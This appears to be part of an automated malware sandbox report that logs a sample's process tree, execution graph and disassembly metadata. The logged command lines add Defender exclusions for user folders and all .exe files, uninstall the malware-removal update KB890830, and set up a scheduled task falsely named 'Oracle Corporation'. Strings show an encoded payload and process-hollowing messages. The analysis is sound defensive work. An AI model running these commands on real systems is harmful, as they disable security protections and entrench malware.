                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:74
                                    Start time:11:38:44
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff702490000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:75
                                    Start time:11:38:44
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:76
                                    Start time:11:38:44
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:77
                                    Start time:11:38:44
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:78
                                    Start time:11:38:44
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\wusa.exe
                                    Wow64 process (32bit):false
                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff765a80000
                                    File size:345'088 bytes
                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:79
                                    Start time:11:38:44
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:80
                                    Start time:11:38:44
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:81
                                    Start time:11:38:44
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:82
                                    Start time:11:38:45
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:83
                                    Start time:11:38:45
                                    Start date:12/01/2025
                                    Path:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Imagebase:0x7ff7c0ef0000
                                    File size:1'245'320 bytes
                                    MD5 hash:DD36F6F79E68D5E54C75527DB2DA97AD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:84
                                    Start time:11:38:45
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:85
                                    Start time:11:38:45
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:86
                                    Start time:11:38:45
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:87
                                    Start time:11:38:45
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:88
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff702490000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:89
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:90
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:91
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:92
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\wusa.exe
                                    Wow64 process (32bit):false
                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff765a80000
                                    File size:345'088 bytes
                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:93
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:94
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:95
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:96
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:97
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Imagebase:0x7ff642720000
                                    File size:1'245'320 bytes
                                    MD5 hash:DD36F6F79E68D5E54C75527DB2DA97AD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:98
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:99
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:100
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:101
                                    Start time:11:38:48
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:102
                                    Start time:11:38:51
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff702490000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:103
                                    Start time:11:38:51
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:104
                                    Start time:11:38:51
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:105
                                    Start time:11:38:51
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:106
                                    Start time:11:38:51
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\wusa.exe
                                    Wow64 process (32bit):false
                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff765a80000
                                    File size:345'088 bytes
                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:188
                                    Start time:11:39:05
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:202
                                    Start time:11:39:07
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:314
                                    Start time:11:39:32
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:329
                                    Start time:11:39:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:370
                                    Start time:11:39:43
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:427
                                    Start time:11:39:55
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:440
                                    Start time:11:39:58
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:0.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:48.1%
                                      Total number of Nodes:54
                                      Total number of Limit Nodes:2
                                      execution_graph 13811 7ff6099b1140 13814 7ff6099b1160 13811->13814 13815 7ff6099b11b9 13814->13815 13816 7ff6099b118b 13814->13816 13817 7ff6099b11d3 13815->13817 13818 7ff6099b11c7 _amsg_exit 13815->13818 13816->13815 13819 7ff6099b1190 13816->13819 13821 7ff6099b1201 _initterm 13817->13821 13822 7ff6099b121a 13817->13822 13818->13817 13819->13815 13820 7ff6099b11a0 Sleep 13819->13820 13820->13815 13820->13819 13821->13822 13839 7ff6099b2410 13822->13839 13824 7ff6099b1247 SetUnhandledExceptionFilter 13825 7ff6099b126a 13824->13825 13826 7ff6099b126f malloc 13825->13826 13827 7ff6099b128b 13826->13827 13830 7ff6099b12d2 13826->13830 13828 7ff6099b12a0 strlen malloc memcpy 13827->13828 13828->13828 13829 7ff6099b12d0 13828->13829 13829->13830 13849 7ff6099d3b80 13830->13849 13840 7ff6099b2432 13839->13840 13845 7ff6099b259f 13839->13845 13841 7ff6099b24e6 13840->13841 13844 7ff6099b252e 13840->13844 13840->13845 13841->13844 14028 7ff6099b2730 13841->14028 13843 7ff6099b2579 VirtualProtect 13843->13844 13844->13843 13844->13845 13846 7ff6099b26c6 13844->13846 13845->13824 13847 7ff6099b2730 4 API calls 13846->13847 13848 7ff6099b26e3 13847->13848 13851 7ff6099d3b96 13849->13851 13850 7ff6099d3c8c wcslen 14038 7ff6099b153f 13850->14038 13851->13850 14031 7ff6099b2752 14028->14031 14029 7ff6099b2794 memcpy 14029->13841 14031->14029 14032 7ff6099b27d5 VirtualQuery 14031->14032 14033 7ff6099b2884 14031->14033 14032->14033 14037 7ff6099b2802 14032->14037 14034 7ff6099b28b3 GetLastError 14033->14034 14035 7ff6099b28c7 14034->14035 14036 7ff6099b2834 VirtualProtect 14036->14029 14036->14034 14037->14029 14037->14036 14042 7ff6099b1394 14038->14042 14040 7ff6099b154e 14041 7ff6099b1394 2 API calls 14040->14041 14046 7ff6099d8680 14042->14046 14044 7ff6099b13b8 14045 7ff6099b13c6 NtCreateDirectoryObject 14044->14045 14045->14040 14047 7ff6099d869e 14046->14047 14049 7ff6099d86cb 14046->14049 14047->14044 14048 7ff6099d8773 14050 7ff6099d878f malloc 14048->14050 14049->14047 14049->14048 14051 7ff6099d87b0 14050->14051 14051->14047 14052 7ff6099b1394 14053 7ff6099d8680 malloc 14052->14053 14054 7ff6099b13b8 14053->14054 14055 7ff6099b13c6 NtCreateDirectoryObject 14054->14055

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                      • String ID:
                                      • API String ID: 2643109117-0
                                      • Opcode ID: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
                                      • Instruction ID: 30b2336c654c570a71ad6ee9cfe768a6f510e1ed3087a4f9d8cac203f3700915
                                      • Opcode Fuzzy Hash: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
                                      • Instruction Fuzzy Hash: 2C512B71A1E64685FA209F16EAA037937B2BF49790F685535CE4EC73A7DE3CA481C340

                                      Control-flow Graph

                                      APIs
                                      • NtCreateDirectoryObject.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6099B1156), ref: 00007FF6099B13F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryObject
                                      • String ID:
                                      • API String ID: 4136754261-0
                                      • Opcode ID: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
                                      • Instruction ID: f2acd27a7cc536c051bb49c4b7ffeaa7e5eda9659cda30be7cd28862afe152a4
                                      • Opcode Fuzzy Hash: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
                                      • Instruction Fuzzy Hash: 21F0F97290DB42D2D610CF51F84202E7BA2FB89381B244839EACC87726EF3CE9508F40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memset$wcscat$wcscpywcslen$_wcsnicmp$_wcsicmp$memcpy
                                      • String ID: $VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn$[ERROR] Failed to decrypt payload$[ERROR] Invalid process handle$[INFO] Mutex already exists: %s$[INFO] Mutex not found: %s$[INFO] Process handle closed$[INFO] Process hollowing executed for program: %s$[INFO] inject_process completed$[INFO] inject_process started$[SUCCESS] Payload decrypted, size: %zu bytes$[SUCCESS] Process handle obtained: 0x%p
                                      • API String ID: 1844779378-2110838316
                                      • Opcode ID: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
                                      • Instruction ID: 9ad18c44aa6adfd373f63306d0be26019fb3295aecc2b476ab4f976944cfb5e9
                                      • Opcode Fuzzy Hash: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
                                      • Instruction Fuzzy Hash: 3E336261C2E6C284F7118F29A8863F47762BF55388F685235DD8ED6BE6EF6C6244C304
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
